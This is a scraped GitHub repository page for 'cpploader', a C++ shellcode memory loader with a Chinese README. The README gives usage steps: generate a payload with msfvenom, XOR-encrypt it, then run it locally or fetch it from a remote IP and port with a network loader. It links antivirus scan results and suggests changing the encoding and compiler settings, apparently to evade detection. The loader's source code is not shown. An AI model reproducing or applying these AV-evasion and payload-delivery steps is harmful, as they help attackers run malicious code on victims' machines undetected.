8000 GitHub - X1r0z/cpploader: c++ shellcode loader
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
This repository was archived by the owner on Dec 17, 2024. It is now read-only.

X1r0z/cpploader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

cpploader

shellcode 内存加载器 C++编写.

usage

生成 payload

msfvenom -p windows/exec CMD=calc.exe -f raw -o calc.bin

加密 payload (默认 xor)

cppencoder.exe calc.bin enc.bin

cpploader 本地执行.

cpploader.exe enc.bin

cppnerloader 网络执行.

cppnetloader.exe 192.168.1.1 5555

report

在线杀软扫描报告.

cpploader

VirScan

VirusTotal

cppnetloader

VirScan

VirusTotal

other

C++ ShellCode 加载器

编码/加密方式可自行发挥.

更改 vs 编译选项缩小体积.

自己写效果更好.

About

c++ shellcode loader

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

0